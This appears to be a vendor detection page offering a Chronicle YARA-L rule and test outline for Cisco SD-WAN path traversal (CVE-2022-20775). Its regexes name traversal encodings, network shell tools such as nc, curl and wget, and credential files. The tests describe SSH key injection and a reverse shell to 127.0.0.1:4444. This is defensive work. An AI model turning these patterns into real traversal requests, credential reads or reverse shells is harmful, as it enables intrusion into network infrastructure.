Detect CVE-2022-20775 — Cisco SD-WAN Path Traversal Exploitation Attempt in Google Chronicle
Detects exploitation attempts targeting CVE-2022-20775, a path traversal vulnerability (CWE-25, CWE-282) in Cisco SD-WAN software. Successful exploitation may allow an authenticated attacker to read or write arbitrary files on the underlying operating system, potentially leading to privilege escalation or persistent access. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog.
MITRE ATT&CK
YARA-L Detection Query
rule cisco_sdwan_path_traversal_cve_2022_20775 {
meta:
author = "df00tech"
description = "Detects CVE-2022-20775 Cisco SD-WAN path traversal exploitation"
severity = "CRITICAL"
reference = "https://nvd.nist.gov/vuln/detail/CVE-2022-20775"
events:
(
// Path traversal in SD-WAN API requests
($e1.metadata.event_type = "NETWORK_HTTP" and
re.regex($e1.network.http.request_url, `(\.\./|%2e%2e%2f|%252e%252e|\.\.%2f)`) and
re.regex($e1.network.http.request_url, `/(dataservice|template|device|vmanage)`))
or
// Suspicious child process from SD-WAN daemon
($e1.metadata.event_type = "PROCESS_LAUNCH" and
re.regex($e1.principal.process.file.full_path, `(vdaemon|vmanage|vbond|vsmart)`) and
re.regex($e1.target.process.file.full_path, `/(bin/)?(bash|sh|python3?|curl|wget|nc)$`))
or
// Sensitive file access from SD-WAN process
($e1.metadata.event_type = "FILE_OPEN" and
re.regex($e1.principal.process.file.full_path, `(vdaemon|vmanage)`) and
re.regex($e1.target.file.full_path, `(/etc/passwd|/etc/shadow|/root/|/.ssh/)`))
)
condition:
$e1
}Chronicle YARA-L rule detecting path traversal exploitation attempts against Cisco SD-WAN APIs, suspicious process spawning by SD-WAN daemons, and sensitive file access from SD-WAN process context.
Data Sources
Required Tables
False Positives & Tuning
- Legitimate vManage API calls using encoded characters from orchestration platforms
- Authorized diagnostic scripts executed under SD-WAN service accounts by network operations teams
- SD-WAN telemetry collectors accessing system statistics files under the vdaemon process
Other platforms for CVE-2022-20775
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Cisco SD-WAN vManage Path Traversal File Read via API
Expected signal: HTTP request log entry with traversal sequence in URI; if successful, HTTP 200 response with /etc/passwd content; file access audit event for /etc/passwd by vManage process
- Test 2Cisco SD-WAN Percent-Encoded Path Traversal Bypass
Expected signal: HTTP access log entry with double-encoded sequence; IDS/WAF alert if deployed; server-side decode of %25 sequences visible in application logs
- Test 3SD-WAN Post-Exploitation SSH Key Injection via Traversal Write
Expected signal: HTTP POST to path traversal URI; file modification event on /root/.ssh/authorized_keys; audit log entry showing vManage process writing to /root/.ssh/
- Test 4Simulate SD-WAN Daemon Spawning Reverse Shell
Expected signal: Process creation event: parent=vmanage, child=bash with -i flag and TCP redirect in command line; network connection from bash process to 127.0.0.1:4444; EDR alert on shell spawned by non-interactive parent
References (4)
- https://www.cisa.gov/news-events/directives/ed-26-03-mitigate-vulnerabilities-cisco-sd-wan-systems
- https://www.cisa.gov/news-events/directives/supplemental-direction-ed-26-03-hunt-and-hardening-guidance-cisco-sd-wan-systems
- https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-sd-wan-priv-E6e8tEdF.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-20775
Unlock Pro Content
Get the full detection package for CVE-2022-20775 including response playbook, investigation guide, and atomic red team tests.